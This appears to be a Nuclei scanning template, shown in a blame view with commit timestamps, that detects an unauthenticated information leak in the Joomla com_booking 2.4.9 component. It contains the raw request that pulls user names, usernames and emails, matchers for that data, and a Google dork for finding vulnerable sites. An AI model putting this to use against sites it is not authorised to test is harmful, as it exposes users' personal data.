2023-10-17 07:20:28 +00:00
id : joomla-com-booking-component
info :
2023-10-17 08:16:05 +00:00
name : Joomla! com_booking component 2.4.9 - Information Leak
2023-10-17 07:20:28 +00:00
author : r3Y3r53
severity : high
description : |
Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
reference :
- https://www.exploit-db.com/exploits/51595
- http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
metadata :
verified : true
max-request : 1
2023-10-17 17:52:26 +00:00
google-query : inurl:"index.php?option=com_booking"
2023-10-17 07:20:28 +00:00
tags : joomla,info-leak,unauth
http :
- raw :
- |
GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1
2023-10-17 08:16:05 +00:00
2023-10-19 10:29:23 +00:00
host-redirects : true
max-redirects : 2
2023-10-19 10:38:59 +00:00
2023-10-19 09:44:58 +00:00
matchers-condition : and
2023-10-17 07:20:28 +00:00
matchers :
2023-10-19 09:44:58 +00:00
- type : word
part : body
words :
2023-10-19 10:29:23 +00:00
- '"name":'
- '"username":'
- '"email":'
2023-10-17 17:52:26 +00:00
condition : and
2023-10-19 09:44:58 +00:00
2023-11-19 23:34:42 +00:00
- type : regex
part : body
regex :
- '^{.*}$'
2023-10-19 10:29:23 +00:00
- type : word
part : header
words :
- "text/html"
2023-10-19 09:44:58 +00:00
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
2023-11-19 23:34:42 +00:00
extractors :
- type : json
name : keys
part : body
json :
2023-11-23 13:28:48 +00:00
- 'keys'
# digest: 4a0a004730450220027375d0f261eaace00d84e4430847abaa9394b10f3a36bf3f06b0ccb930c16c02210082aee52e5935211a37197b345cdb0953565f1bab9b625758052e59fa3571fdee:922c64590222798bb761d5b6d8e72950
